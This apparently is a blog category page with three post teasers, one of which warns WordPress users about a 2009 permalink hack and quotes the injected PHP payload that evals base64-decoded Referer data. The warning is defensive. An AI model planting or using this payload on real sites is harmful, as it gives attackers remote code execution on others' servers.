Geek Miscellany

Black holes, LHC, Star Wars, quantum uncertainty… if it is of general geek interest, but doesn’t fit into one of the other categories, it lands here.

Newsflash: people who don’t like computers prefer non-geeky workspaces

According to a recent study at the University of Washington, people who aren’t really interested in computing science are even less interested if asked about it in a room with science fiction paraphernalia, games, and soft drink cans. Apparently some of these non-technically-inclined people are women. Glory be, we have a great discovery!

Actually, not really, at least not in my uneducated opinion, with which you are free to disagree…   

(more…)

Continue ReadingNewsflash: people who don’t like computers prefer non-geeky workspaces

WordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/


If you are running a WordPress based blog like I am and suddenly notice your post URLs have something “extra” appended (see the subject line), your blog has been hacked.

You can read more about it here (thanks, UCLABoyz, thanks schang!), where you will also find guidance regarding cleaning the problem up. Unfortunately, it appears that the hack works on all versions of WordPress up to and including the most recent.

I have BadBehavior installed on my blog, and so it was rejecting the URLs with this addition which I *think* would be thwarting the hackers involved: they hadn’t been able to create an administrative user. Unfortunately, it also meant none of my blog posts were working properly until I noticed the problem and corrected it.

Hopefully WordPress will issue a fix for this soon- in the mean time, keep an eye on your URLs, WordPress bloggers!

UPDATE: Another link to a lengthy thread regarding this hack on the WordPress.org site. What is interesting here is the apparent vector: a weakness in the WordPress code, apparently up to and including the most recent release, that permits an ordinary subscriber (i.e.: not an administrative user) to run some administrator features e.g.: changing the permalinks.

UPDATE #2: it appears that updating to the most recent version of WordPress (2.8.4) removes the “double slash” vector for running some admin commands (notably permalink.php). This fix was apparently added somewhere between WordPress version 2.8 and 2.8.4.

I’ve included some extracts from my server logs and further thoughts below…

  

(more…)

Continue ReadingWordPress SQL injection hack: watch for=> %&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/

Cyberwar? No, malicious script kiddy

According to the lead Republican on the House Intelligence Committee, Peter Hoekstra, the U.S. should launch an all out retaliation against North Korea for their role in the recent cyber attacks on American and South Korean internet targets. Unfortunately for the American people, Mr. Hoekstra is either an idiot, willfully ignorant, or intentionally twisting reality for his own political ends. The best experts in the industry agree that the attacks were launched by an attention-seeking amateur.

(more…)

Continue ReadingCyberwar? No, malicious script kiddy

End of content

No more pages to load